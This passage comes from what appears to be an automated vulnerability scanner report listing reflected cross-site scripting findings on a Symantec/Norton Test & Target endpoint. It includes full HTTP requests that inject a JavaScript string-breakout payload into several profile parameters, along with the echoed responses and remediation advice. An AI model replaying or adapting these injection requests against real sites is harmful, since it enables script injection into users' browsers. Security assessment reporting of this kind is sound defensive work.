1.19. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._COUNTRY parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://symantec.tt.omtrdc.net
Path:   /m2/symantec/mbox/standard

Issue detail

The value of the profile._COUNTRY request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9bb0'%3balert(1)//5d1463e55f1 was submitted in the profile._COUNTRY parameter. This input was echoed as e9bb0';alert(1)//5d1463e55f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m2/symantec/mbox/standard?mboxHost=buy.norton.com&mboxSession=1319387371643-200926&mboxPage=1319387375122-217440&screenHeight=1200&screenWidth=1920&browserWidth=1176&browserHeight=904&browserTimeOffset=-300&colorDepth=16&mboxCount=1&profile._COUNTRY=USe9bb0'%3balert(1)//5d1463e55f1&profile._SUBCHANNEL=Online%20(1st)&profile._LANGUAGE=en&profile._TRAFFIC_SOURCE=trf_id%3Asymcom&profile._PGM_ID=&profile._PGM_TYPE=UNKNOWN&profile._IPC=&profile._IPF=&profile._IPD=Symantec&profile._IPV=&_COUNTRY=US&_SUBCHANNEL=Online%20(1st)&_LANGUAGE=en&_TRAFFIC_SOURCE=trf_id%3Asymcom&_ORIG_SUB=Online%20(1st)&PIFCAM=&_I_SKU=&_INID=us_ghp_onlinestoretab_link3_to_store&_IUC=&_IPL=en&_ENP=&_SKT=&_ITD=&path=%2Festore%2Fmf%2FlandingProductFeatures&version=2011-09&fileSource=mboxCLP&mbox=TT_PROMO_BANNER_SHOWN&mboxId=0&mboxTime=1319369371933&mboxURL=http%3A%2F%2Fbuy.norton.com%2Festore%2Fmf%2FlandingProductFeatures%3Frdid%3D25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Findex.jsp&mboxVersion=40&exp=show HTTP/1.1
Host: symantec.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 1886
Date: Sun, 23 Oct 2011 16:32:17 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('TT_PROMO_BANNER_SHOWN',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-de
...[SNIP]...
<!-- [[ PROFILES ]] _COUNTRY=USe9bb0';alert(1)//5d1463e55f1, _LANGUAGE=en, _SUBCHANNEL=Online (1st), _TRAFFIC_SOURCE=trf_id:symcom, _PGM_ID=, _PGM_TYPE=UNKNOWN, _IPD=Symantec, _IPF=, _IPV=, _IPC= -->
...[SNIP]...

1.20. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._IPC parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://symantec.tt.omtrdc.net
Path:   /m2/symantec/mbox/standard

Issue detail

The value of the profile._IPC request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eaf74'%3balert(1)//28c1bcc212f was submitted in the profile._IPC parameter. This input was echoed as eaf74';alert(1)//28c1bcc212f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m2/symantec/mbox/standard?mboxHost=buy.norton.com&mboxSession=1319387371643-200926&mboxPage=1319387371643-200926&screenHeight=1200&screenWidth=1920&browserWidth=1176&browserHeight=904&browserTimeOffset=-300&colorDepth=16&mboxCount=1&profile._COUNTRY=US&profile._SUBCHANNEL=Online%20(1st)&profile._LANGUAGE=en&profile._TRAFFIC_SOURCE=trf_id%3Asymcom&profile._PGM_ID=&profile._PGM_TYPE=UNKNOWN&profile._IPC=eaf74'%3balert(1)//28c1bcc212f&profile._IPF=&profile._IPD=Symantec&profile._IPV=&_COUNTRY=US&_SUBCHANNEL=Online%20(1st)&_LANGUAGE=en&_TRAFFIC_SOURCE=trf_id%3Asymcom&_ORIG_SUB=Online%20(1st)&PIFCAM=&_I_SKU=&_INID=us_ghp_onlinestoretab_link3_to_store&_IUC=&_IPL=en&_ENP=&_SKT=&_ITD=&path=%2Festore%2Fmf%2FlandingProductFeatures&version=2011-09&fileSource=mboxCLP&mbox=estore_mf_landingProductFeatures&mboxId=0&mboxTime=1319369371933&mboxURL=http%3A%2F%2Fbuy.norton.com%2Festore%2Fmf%2FlandingProductFeatures%3Frdid%3D25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Findex.jsp&mboxVersion=40 HTTP/1.1
Host: symantec.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 13927
Date: Sun, 23 Oct 2011 16:32:15 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('estore_mf_landingProductFeatures',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mbox
...[SNIP]...
<!-- [[ PROFILES ]] _COUNTRY=US, _LANGUAGE=en, _SUBCHANNEL=Online (1st), _TRAFFIC_SOURCE=trf_id:symcom, _PGM_ID=, _PGM_TYPE=UNKNOWN, _IPD=Symantec, _IPF=, _IPV=, _IPC=eaf74';alert(1)//28c1bcc212f -->
...[SNIP]...

1.21. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._IPD parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://symantec.tt.omtrdc.net
Path:   /m2/symantec/mbox/standard

Issue detail

The value of the profile._IPD request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8246'%3balert(1)//7fd190a3b78 was submitted in the profile._IPD parameter. This input was echoed as d8246';alert(1)//7fd190a3b78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m2/symantec/mbox/standard?mboxHost=buy.norton.com&mboxSession=1319387371643-200926&mboxPage=1319387371643-200926&screenHeight=1200&screenWidth=1920&browserWidth=1176&browserHeight=904&browserTimeOffset=-300&colorDepth=16&mboxCount=1&profile._COUNTRY=US&profile._SUBCHANNEL=Online%20(1st)&profile._LANGUAGE=en&profile._TRAFFIC_SOURCE=trf_id%3Asymcom&profile._PGM_ID=&profile._PGM_TYPE=UNKNOWN&profile._IPC=&profile._IPF=&profile._IPD=Symantecd8246'%3balert(1)//7fd190a3b78&profile._IPV=&_COUNTRY=US&_SUBCHANNEL=Online%20(1st)&_LANGUAGE=en&_TRAFFIC_SOURCE=trf_id%3Asymcom&_ORIG_SUB=Online%20(1st)&PIFCAM=&_I_SKU=&_INID=us_ghp_onlinestoretab_link3_to_store&_IUC=&_IPL=en&_ENP=&_SKT=&_ITD=&path=%2Festore%2Fmf%2FlandingProductFeatures&version=2011-09&fileSource=mboxCLP&mbox=estore_mf_landingProductFeatures&mboxId=0&mboxTime=1319369371933&mboxURL=http%3A%2F%2Fbuy.norton.com%2Festore%2Fmf%2FlandingProductFeatures%3Frdid%3D25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Findex.jsp&mboxVersion=40 HTTP/1.1
Host: symantec.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 13927
Date: Sun, 23 Oct 2011 16:32:20 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('estore_mf_landingProductFeatures',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mbox
...[SNIP]...
<!-- [[ PROFILES ]] _COUNTRY=US, _LANGUAGE=en, _SUBCHANNEL=Online (1st), _TRAFFIC_SOURCE=trf_id:symcom, _PGM_ID=, _PGM_TYPE=UNKNOWN, _IPD=Symantecd8246';alert(1)//7fd190a3b78, _IPF=, _IPV=, _IPC= -->
...[SNIP]...

1.22. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._IPF parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://symantec.tt.omtrdc.net
Path:   /m2/symantec/mbox/standard

Issue detail

The value of the profile._IPF request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6117c'%3balert(1)//71fc5cb571a was submitted in the profile._IPF parameter. This input was echoed as 6117c';alert(1)//71fc5cb571a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m2/symantec/mbox/standard?mboxHost=buy.norton.com&mboxSession=1319387371643-200926&mboxPage=1319387371643-200926&screenHeight=1200&screenWidth=1920&browserWidth=1176&browserHeight=904&browserTimeOffset=-300&colorDepth=16&mboxCount=1&profile._COUNTRY=US&profile._SUBCHANNEL=Online%20(1st)&profile._LANGUAGE=en&profile._TRAFFIC_SOURCE=trf_id%3Asymcom&profile._PGM_ID=&profile._PGM_TYPE=UNKNOWN&profile._IPC=&profile._IPF=6117c'%3balert(1)//71fc5cb571a&profile._IPD=Symantec&profile._IPV=&_COUNTRY=US&_SUBCHANNEL=Online%20(1st)&_LANGUAGE=en&_TRAFFIC_SOURCE=trf_id%3Asymcom&_ORIG_SUB=Online%20(1st)&PIFCAM=&_I_SKU=&_INID=us_ghp_onlinestoretab_link3_to_store&_IUC=&_IPL=en&_ENP=&_SKT=&_ITD=&path=%2Festore%2Fmf%2FlandingProductFeatures&version=2011-09&fileSource=mboxCLP&mbox=estore_mf_landingProductFeatures&mboxId=0&mboxTime=1319369371933&mboxURL=http%3A%2F%2Fbuy.norton.com%2Festore%2Fmf%2FlandingProductFeatures%3Frdid%3D25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Findex.jsp&mboxVersion=40 HTTP/1.1
Host: symantec.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 13927
Date: Sun, 23 Oct 2011 16:32:17 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('estore_mf_landingProductFeatures',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mbox
...[SNIP]...
<!-- [[ PROFILES ]] _COUNTRY=US, _LANGUAGE=en, _SUBCHANNEL=Online (1st), _TRAFFIC_SOURCE=trf_id:symcom, _PGM_ID=, _PGM_TYPE=UNKNOWN, _IPD=Symantec, _IPF=6117c';alert(1)//71fc5cb571a, _IPV=, _IPC= -->
...[SNIP]...

1.23. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._IPV parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://symantec.tt.omtrdc.net
Path:   /m2/symantec/mbox/standard

Issue detail

The value of the profile._IPV request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72b62'%3balert(1)//3d546e6880f was submitted in the profile._IPV parameter. This input was echoed as 72b62';alert(1)//3d546e6880f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m2/symantec/mbox/standard?mboxHost=buy.norton.com&mboxSession=1319387371643-200926&mboxPage=1319387371643-200926&screenHeight=1200&screenWidth=1920&browserWidth=1176&browserHeight=904&browserTimeOffset=-300&colorDepth=16&mboxCount=1&profile._COUNTRY=US&profile._SUBCHANNEL=Online%20(1st)&profile._LANGUAGE=en&profile._TRAFFIC_SOURCE=trf_id%3Asymcom&profile._PGM_ID=&profile._PGM_TYPE=UNKNOWN&profile._IPC=&profile._IPF=&profile._IPD=Symantec&profile._IPV=72b62'%3balert(1)//3d546e6880f&_COUNTRY=US&_SUBCHANNEL=Online%20(1st)&_LANGUAGE=en&_TRAFFIC_SOURCE=trf_id%3Asymcom&_ORIG_SUB=Online%20(1st)&PIFCAM=&_I_SKU=&_INID=us_ghp_onlinestoretab_link3_to_store&_IUC=&_IPL=en&_ENP=&_SKT=&_ITD=&path=%2Festore%2Fmf%2FlandingProductFeatures&version=2011-09&fileSource=mboxCLP&mbox=estore_mf_landingProductFeatures&mboxId=0&mboxTime=1319369371933&mboxURL=http%3A%2F%2Fbuy.norton.com%2Festore%2Fmf%2FlandingProductFeatures%3Frdid%3D25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Findex.jsp&mboxVersion=40 HTTP/1.1
Host: symantec.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 13927
Date: Sun, 23 Oct 2011 16:32:22 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('estore_mf_landingProductFeatures',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mbox
...[SNIP]...
<!-- [[ PROFILES ]] _COUNTRY=US, _LANGUAGE=en, _SUBCHANNEL=Online (1st), _TRAFFIC_SOURCE=trf_id:symcom, _PGM_ID=, _PGM_TYPE=UNKNOWN, _IPD=Symantec, _IPF=, _IPV=72b62';alert(1)//3d546e6880f, _IPC= -->
...[SNIP]...

1.24. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._LANGUAGE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://symantec.tt.omtrdc.net
Path:   /m2/symantec/mbox/standard

Issue detail

The value of the profile._LANGUAGE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94177'%3balert(1)//fd44a2d4e63 was submitted in the profile._LANGUAGE parameter. This input was echoed as 94177';alert(1)//fd44a2d4e63 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m2/symantec/mbox/standard?mboxHost=buy.norton.com&mboxSession=1319387371643-200926&mboxPage=1319387371643-200926&screenHeight=1200&screenWidth=1920&browserWidth=1176&browserHeight=904&browserTimeOffset=-300&colorDepth=16&mboxCount=1&profile._COUNTRY=US&profile._SUBCHANNEL=Online%20(1st)&profile._LANGUAGE=en94177'%3balert(1)//fd44a2d4e63&profile._TRAFFIC_SOURCE=trf_id%3Asymcom&profile._PGM_ID=&profile._PGM_TYPE=UNKNOWN&profile._IPC=&profile._IPF=&profile._IPD=Symantec&profile._IPV=&_COUNTRY=US&_SUBCHANNEL=Online%20(1st)&_LANGUAGE=en&_TRAFFIC_SOURCE=trf_id%3Asymcom&_ORIG_SUB=Online%20(1st)&PIFCAM=&_I_SKU=&_INID=us_ghp_onlinestoretab_link3_to_store&_IUC=&_IPL=en&_ENP=&_SKT=&_ITD=&path=%2Festore%2Fmf%2FlandingProductFeatures&version=2011-09&fileSource=mboxCLP&mbox=estore_mf_landingProductFeatures&mboxId=0&mboxTime=1319369371933&mboxURL=http%3A%2F%2Fbuy.norton.com%2Festore%2Fmf%2FlandingProductFeatures%3Frdid%3D25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Findex.jsp&mboxVersion=40 HTTP/1.1
Host: symantec.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 13927
Date: Sun, 23 Oct 2011 16:32:06 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('estore_mf_landingProductFeatures',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mbox
...[SNIP]...
<!-- [[ PROFILES ]] _COUNTRY=US, _LANGUAGE=en94177';alert(1)//fd44a2d4e63, _SUBCHANNEL=Online (1st), _TRAFFIC_SOURCE=trf_id:symcom, _PGM_ID=, _PGM_TYPE=UNKNOWN, _IPD=Symantec, _IPF=, _IPV=, _IPC= -->
...[SNIP]...

1.25. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._PGM_ID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://symantec.tt.omtrdc.net
Path:   /m2/symantec/mbox/standard

Issue detail

The value of the profile._PGM_ID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb89b'%3balert(1)//5012da3bc22 was submitted in the profile._PGM_ID parameter. This input was echoed as cb89b';alert(1)//5012da3bc22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m2/symantec/mbox/standard?mboxHost=buy.norton.com&mboxSession=1319387371643-200926&mboxPage=1319387371643-200926&screenHeight=1200&screenWidth=1920&browserWidth=1176&browserHeight=904&browserTimeOffset=-300&colorDepth=16&mboxCount=1&profile._COUNTRY=US&profile._SUBCHANNEL=Online%20(1st)&profile._LANGUAGE=en&profile._TRAFFIC_SOURCE=trf_id%3Asymcom&profile._PGM_ID=cb89b'%3balert(1)//5012da3bc22&profile._PGM_TYPE=UNKNOWN&profile._IPC=&profile._IPF=&profile._IPD=Symantec&profile._IPV=&_COUNTRY=US&_SUBCHANNEL=Online%20(1st)&_LANGUAGE=en&_TRAFFIC_SOURCE=trf_id%3Asymcom&_ORIG_SUB=Online%20(1st)&PIFCAM=&_I_SKU=&_INID=us_ghp_onlinestoretab_link3_to_store&_IUC=&_IPL=en&_ENP=&_SKT=&_ITD=&path=%2Festore%2Fmf%2FlandingProductFeatures&version=2011-09&fileSource=mboxCLP&mbox=estore_mf_landingProductFeatures&mboxId=0&mboxTime=1319369371933&mboxURL=http%3A%2F%2Fbuy.norton.com%2Festore%2Fmf%2FlandingProductFeatures%3Frdid%3D25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Findex.jsp&mboxVersion=40 HTTP/1.1
Host: symantec.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 13927
Date: Sun, 23 Oct 2011 16:32:11 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('estore_mf_landingProductFeatures',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mbox
...[SNIP]...
<!-- [[ PROFILES ]] _COUNTRY=US, _LANGUAGE=en, _SUBCHANNEL=Online (1st), _TRAFFIC_SOURCE=trf_id:symcom, _PGM_ID=cb89b';alert(1)//5012da3bc22, _PGM_TYPE=UNKNOWN, _IPD=Symantec, _IPF=, _IPV=, _IPC= -->
...[SNIP]...

1.26. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._PGM_TYPE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://symantec.tt.omtrdc.net
Path:   /m2/symantec/mbox/standard

Issue detail

The value of the profile._PGM_TYPE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7642'%3balert(1)//f2928718417 was submitted in the profile._PGM_TYPE parameter. This input was echoed as d7642';alert(1)//f2928718417 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m2/symantec/mbox/standard?mboxHost=buy.norton.com&mboxSession=1319387371643-200926&mboxPage=1319387371643-200926&screenHeight=1200&screenWidth=1920&browserWidth=1176&browserHeight=904&browserTimeOffset=-300&colorDepth=16&mboxCount=1&profile._COUNTRY=US&profile._SUBCHANNEL=Online%20(1st)&profile._LANGUAGE=en&profile._TRAFFIC_SOURCE=trf_id%3Asymcom&profile._PGM_ID=&profile._PGM_TYPE=UNKNOWNd7642'%3balert(1)//f2928718417&profile._IPC=&profile._IPF=&profile._IPD=Symantec&profile._IPV=&_COUNTRY=US&_SUBCHANNEL=Online%20(1st)&_LANGUAGE=en&_TRAFFIC_SOURCE=trf_id%3Asymcom&_ORIG_SUB=Online%20(1st)&PIFCAM=&_I_SKU=&_INID=us_ghp_onlinestoretab_link3_to_store&_IUC=&_IPL=en&_ENP=&_SKT=&_ITD=&path=%2Festore%2Fmf%2FlandingProductFeatures&version=2011-09&fileSource=mboxCLP&mbox=estore_mf_landingProductFeatures&mboxId=0&mboxTime=1319369371933&mboxURL=http%3A%2F%2Fbuy.norton.com%2Festore%2Fmf%2FlandingProductFeatures%3Frdid%3D25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Findex.jsp&mboxVersion=40 HTTP/1.1
Host: symantec.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 13927
Date: Sun, 23 Oct 2011 16:32:13 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('estore_mf_landingProductFeatures',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mbox
...[SNIP]...
<!-- [[ PROFILES ]] _COUNTRY=US, _LANGUAGE=en, _SUBCHANNEL=Online (1st), _TRAFFIC_SOURCE=trf_id:symcom, _PGM_ID=, _PGM_TYPE=UNKNOWNd7642';alert(1)//f2928718417, _IPD=Symantec, _IPF=, _IPV=, _IPC= -->
...[SNIP]...

1.27. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._SUBCHANNEL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://symantec.tt.omtrdc.net
Path:   /m2/symantec/mbox/standard

Issue detail

The value of the profile._SUBCHANNEL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66983'%3balert(1)//a3bf71ee914 was submitted in the profile._SUBCHANNEL parameter. This input was echoed as 66983';alert(1)//a3bf71ee914 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m2/symantec/mbox/standard?mboxHost=buy.norton.com&mboxSession=1319387371643-200926&mboxPage=1319387371643-200926&screenHeight=1200&screenWidth=1920&browserWidth=1176&browserHeight=904&browserTimeOffset=-300&colorDepth=16&mboxCount=1&profile._COUNTRY=US&profile._SUBCHANNEL=Online%20(1st)66983'%3balert(1)//a3bf71ee914&profile._LANGUAGE=en&profile._TRAFFIC_SOURCE=trf_id%3Asymcom&profile._PGM_ID=&profile._PGM_TYPE=UNKNOWN&profile._IPC=&profile._IPF=&profile._IPD=Symantec&profile._IPV=&_COUNTRY=US&_SUBCHANNEL=Online%20(1st)&_LANGUAGE=en&_TRAFFIC_SOURCE=trf_id%3Asymcom&_ORIG_SUB=Online%20(1st)&PIFCAM=&_I_SKU=&_INID=us_ghp_onlinestoretab_link3_to_store&_IUC=&_IPL=en&_ENP=&_SKT=&_ITD=&path=%2Festore%2Fmf%2FlandingProductFeatures&version=2011-09&fileSource=mboxCLP&mbox=estore_mf_landingProductFeatures&mboxId=0&mboxTime=1319369371933&mboxURL=http%3A%2F%2Fbuy.norton.com%2Festore%2Fmf%2FlandingProductFeatures%3Frdid%3D25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Findex.jsp&mboxVersion=40 HTTP/1.1
Host: symantec.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=25eac085-f6d1-4c22-8e6e-504dc00dd5e71319387367138
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 13927
Date: Sun, 23 Oct 2011 16:32:04 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('estore_mf_landingProductFeatures',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mbox
...[SNIP]...
